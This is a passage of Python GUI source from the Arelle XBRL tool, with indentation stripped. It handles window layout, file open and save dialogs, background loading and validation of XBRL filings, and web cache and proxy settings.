self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
# load argv overrides for modelManager options
lastArg = None
for arg in sys.argv:
if not arg: continue
if lastArg == "--skipLoading": # skip loading matching files (list of unix patterns)
self.modelManager.skipLoading = re.compile('|'.join(fnmatch.translate(f) for f in arg.split('|')))
elif arg == "--skipDTS": # skip DTS loading, discovery, etc
self.modelManager.skipDTS = True
lastArg = arg
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def okayToContinue(self):
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
def fileSave(self, event=None, view=None, fileType=None, filenameFromInstance=False, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XLSX file"), "*.xlsx"),(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".xlsx")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
elif isinstance(view, ViewWinFactList.ViewFactList):
ViewFileFactList.viewFacts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
filename = xbrlLoadedMethod(self, filename) # runs in GUI thread, allows mapping filename, mult return filename
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.validationType == "EFM")
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if not isinstance(filename, (dict, list)): # json objects
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=self.backgroundLoadXbrl, args=(filesource,importToDTS,selectTopView), daemon=True).start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
url = xbrlLoadedMethod(self, url) # runs in GUI thread, allows mapping url, mult return url
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=self.backgroundLoadXbrl, args=(filesource,False,False), daemon=True).start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url, isSupplemental=importToDTS)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"),
checkModifiedTime=isHttpUrl(filesource.url)) # check modified time if GUI-loading from web
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI, indexLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl, lang=self.labelLang)
if firstTableLinkroleURI is not None:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang, linkrole=indexLinkroleURI,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of DTS"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if (not modelXbrl.hasTableRendering and # table view only if not grid rendered view
modelXbrl.relationshipSet(XbrlConst.parentChild)): # requires presentation relationships to render this tab
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI is not None)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "dimensions relationships view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
currentAction = "plugin method CntlrWinMain.Xbrl.Loaded"
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
self.currentView = None
def fileReopen(self, *ignore):
self.fileClose()
fileHistory = self.config.setdefault("fileHistory", [])
if len(fileHistory) > 0:
self.fileOpenFile(fileHistory[0])
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=self.backgroundValidate, daemon=True).start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=self.backgroundCompareDTSes, args=(versReportFile,), daemon=True).start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def setNoCertificateCheck(self, *args):
self.webCache.noCertificateCheck = self.noCertificateCheck.get() # resets proxy handlers
self.config["noCertificateCheck"] = self.webCache.noCertificateCheck
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=backgroundClearCache, daemon=True).start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
